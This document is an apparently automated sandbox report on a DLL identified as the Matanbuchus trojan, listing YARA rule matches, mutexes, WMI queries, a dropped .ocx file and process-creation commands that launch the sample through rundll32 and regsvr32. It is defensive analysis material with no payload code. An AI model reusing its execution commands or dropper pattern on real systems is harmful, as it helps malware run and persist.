Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE694FF	34_2_7EE694FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C44C	34_2_7EE7C44C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C448	34_2_7EE7C448
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C426	34_2_7EE7C426
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6A430	34_2_7EE6A430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEA7510	34_2_7EEA7510
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C27E	34_2_7EE7C27E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF53AC	34_2_7EEF53AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE2390	34_2_7EEE2390
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7B32B	34_2_7EE7B32B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEB8180	34_2_7EEB8180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEAF190	34_2_7EEAF190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE74128	34_2_7EE74128

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EDE1850 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EDEF80D appears 128 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7F3DF80D appears 128 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7EEEF80D appears 128 times

One or more processes crash

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Yara signature match

Source: file.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.evad.winDLL@44/7@3/2

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\8f08
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3164e4ff-c709-4dec-a976-0f3f08fd1379

Source: file.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense

Source: file.dll

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
